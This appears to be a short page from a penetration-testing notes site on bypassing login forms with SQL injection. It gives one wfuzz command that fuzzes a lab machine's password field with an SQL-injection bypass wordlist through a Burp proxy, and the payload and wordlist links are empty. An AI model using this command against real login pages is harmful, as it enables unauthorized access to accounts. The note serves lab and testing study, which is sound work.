Authentication bypass

Authentication bypass with SQL

Sending all the request through burpsuite (-p option)

 wfuzz -c -z file,sqlibypass.txt -d "__csrf_magic=sid%3Aa839ec5433fa491b740a65d8466329fe409d20b0%2C1569615456&usernamefld=admin&passwordfld=FUZZ&login=Login" -u http://10.10.10.60/index.php -p 127.0.0.1:8080 -L

Payloads available on:

Wordlist to use with Burpsuite Intruder:

References

Last updated

Was this helpful?